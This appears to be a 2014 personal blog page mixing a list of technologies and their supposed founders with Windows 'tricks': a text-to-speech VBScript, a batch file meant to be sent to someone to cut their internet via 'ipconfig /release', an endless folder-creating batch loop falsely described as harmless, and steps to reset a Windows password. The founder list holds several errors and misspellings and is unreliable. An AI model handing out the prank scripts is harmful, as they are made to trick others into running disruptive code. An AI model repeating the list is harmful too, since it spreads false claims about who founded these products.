Monday 25 August 2014

***Different Technologies & Their Founders...***



1. Google: Larry Page & Sergey Brin
2. Facebook: Mark Zuckerberg
3. Yahoo: David Filo & Jerry Yang
4. Twitter: Jack Dorsey & Dick Costolo
5. Internet: Tim Berners Lee
6. Linkdin: Reid Hoffman, Allen Blue & Koonstantin Guericke
7. Email: Shiva Ayyadurai
8. Gtalk: Richard Wah kan
9. Whats up: Laurel Kirtz
10. Hotmail: Sabeer Bhatia
11. Orkut: Buyukkokten
12. Wikipedia: Jimmy Wales
13. You tube: Steve Chen, Chad Hurley & Jawed Karim
14. Rediffmail: Ajit Balakrishnan
15. Nimbuzz: Martin Smink & Evert Jaap Lugt
16. Myspace: Chris Dewolfe & Tom Anderson
17. Ibibo: Ashish Kashyap
18. OLX: Alec Oxenford & Fabrice Grinda
19. Skype: Niklas Zennstrom,JanusFriis & Reid Hoffman
20. Opera: Jon Stephenson von Tetzchner & Geir lvarsoy
21. Mozilla Firefox: Dave Hyatt & Blake Ross
22. Blogger: Evan Willams

Sunday 24 August 2014

**** Convert Any text To Audio without any Software****





1:- Notepad type:-

Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message

2:- save file ".vbs" and open file and ok click




Wednesday 13 August 2014

***How to stop someone's internet access***



                





@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

inspire cyber security

***How To Make more than thousands of folder Using notepad***




          


1. Open notepad. 
2. Copy the following code:

@echo off
:top
md %random%
goto top

3. save it as fun.bat

If you will open that file that folder will be rained by more than thousand of folders. It will not cause any harm to your computer, if you want you can try this.


inspire cyber security











***Change Windows Password Without Knowing Old One***




Step 1 :
Start Menu > Computer > Right Click > Manage

Step 2 :
System Tool > Local User and Group


Step 3 :
Double Click on User  (exp. your  Pc Name )

Step 4 :
 Chose User > Right Click on It > Set Password

Step 5 :
Click on Proceed button

Step 6 :
Then Set your New Passowrd


inspire cyber security